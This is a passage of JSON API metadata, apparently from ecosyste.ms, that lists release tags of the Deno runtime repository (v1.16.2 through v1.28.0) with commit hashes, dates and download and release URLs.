deno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.0